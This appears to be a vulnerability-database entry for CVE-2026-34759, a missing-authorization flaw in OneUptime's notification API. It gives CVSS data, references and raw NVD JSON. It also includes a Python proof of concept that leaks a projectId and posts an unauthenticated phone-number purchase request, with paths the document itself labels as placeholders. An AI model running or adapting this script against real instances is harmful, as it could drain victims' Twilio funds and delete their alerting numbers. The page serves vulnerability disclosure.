Security Vulnerability Report
CVE-2026-34759 CVSS 8.1 HIGH

Published: 2026-04-02 19:21:34
Last Modified: 2026-04-13 18:45:19

Description

OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.42, multiple notification API endpoints are registered without authentication middleware, while sibling endpoints in the same codebase correctly use ClusterKeyAuthorization.isAuthorizedServiceMiddleware. These endpoints are externally reachable via the Nginx proxy at /notification/. Combined with a projectId leak from the public Status Page API, an unauthenticated attacker can purchase phone numbers on the victim's Twilio account and delete all existing alerting numbers. This issue has been patched in version 10.0.42.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Secondary CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N (9.2 CRITICAL)
Weakness
CWE-862 Missing Authorization

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE
OneUptime < 10.0.42

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Both URL paths in it are placeholders, not the real OneUptime routes; the actual affected endpoints are described in the vendor advisory (GHSA-6wc5-rhvj-cx7f). A successful request is not a harmless probe: it spends money on the victim's Twilio account and can delete the alerting numbers, so run it only against a disposable lab instance you own.
python
# PoC for CVE-2026-34759
# Demonstrates the lack of authentication on notification endpoints.
# Both paths below are hypothetical placeholders, not the real routes.
import requests

target_url = "https://target-oneuptime-instance.com"

# Step 1: Leak projectId from the public Status Page API
print("[+] Attempting to leak projectId...")
status_api_response = requests.get(
    f"{target_url}/api/status-page/public",  # Hypothetical path
    timeout=10,
)
try:
    project_id = status_api_response.json().get("data", {}).get("projectId")  # Hypothetical extraction
except ValueError:
    project_id = None  # Response was not JSON

if project_id:
    print(f"[+] ProjectId found: {project_id}")

    # Step 2: Call the unauthenticated notification endpoint
    # Example: purchasing a phone number via the Twilio integration
    exploit_headers = {
        "Content-Type": "application/json"
        # Note: no cluster key or Authorization header is sent; the
        # vulnerable route never checks for one.
    }
    payload = {
        "projectId": project_id,
        "phoneNumber": "+15550199",
        "action": "purchase",
    }
    exploit_url = f"{target_url}/notification/endpoint"  # Hypothetical vulnerable endpoint
    response = requests.post(exploit_url, json=payload, headers=exploit_headers, timeout=10)
    if response.status_code == 200:
        print("[+] Exploit successful! Action performed without authentication.")
    else:
        print(f"[-] Exploit failed (HTTP {response.status_code}).")
else:
    print("[-] Could not retrieve projectId.")

References

https://github.com/OneUptime/oneuptime/security/advisories/GHSA-6wc5-rhvj-cx7f (Vendor Advisory, Exploit, Mitigation)
https://github.com/OneUptime/oneuptime/commit/9adbd04538714740506708d6fa610e433be4d2a4 (Patch)
https://github.com/OneUptime/oneuptime/releases/tag/10.0.42 (Release Notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34759", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:21:33.833", "lastModified": "2026-04-13T18:45:18.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.42, multiple notification API endpoints are registered without authentication middleware, while sibling endpoints in the same codebase correctly use ClusterKeyAuthorization.isAuthorizedServiceMiddleware. These endpoints are externally reachable via the Nginx proxy at /notification/. Combined with a projectId leak from the public Status Page API, an unauthenticated attacker can purchase phone numbers on the victim's Twilio account and delete all existing alerting numbers. This issue has been patched in version 10.0.42."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.42", "matchCriteriaId": "4F312DCA-BDD5-465F-9848-5CD35CDFC185"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/9adbd04538714740506708d6fa610e433be4d2a4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.42", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-6wc5-rhvj-cx7f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}